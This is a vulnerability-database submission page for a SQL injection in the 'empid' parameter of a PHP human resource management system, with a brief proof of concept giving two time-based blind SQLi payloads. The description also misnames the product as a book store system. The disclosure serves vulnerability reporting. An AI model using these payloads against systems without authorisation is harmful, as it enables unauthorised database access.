제출 #54230: Human Resource Management System 1.0 SQL Injection정보

제목	Human Resource Management System 1.0 SQL Injection
설명	Description: Vulnerability was found in SourceCodester Book Store Management System 1.0. A SQL Injection vulnerability in /hrm/employeeadd.php with `empid` handler. The product(s): https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html Affected component(s): /hrm/employeeadd.php Proof of Concept: Login as admin and go to `http://localhost/hrm/employeeadd.php` Payload SQLi with sleep(1): /hrm/employeeadd.php?empid=1%27%20or%20sleep(1)%20--%20- Payload SQLi with sleep(10): /hrm/employeeadd.php?empid=1%27%20or%20sleep(10)%20--%20-
원천	⚠️ https://github.com/leecybersec/bug-report/tree/main/sourcecodester/oretnom23/hrm/employeeadd-sqli
사용자	leecybersec (UID 36724)
제출	2022. 12. 02. AM 08:42 (3 연령 ago)
모더레이션	2022. 12. 03. PM 05:16 (1 day later)
상태	수락
VulDB 항목	214775 [SourceCodester Human Resource Management System 1.0 /hrm/employeeadd.php empid SQL 주입]
포인트들	20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!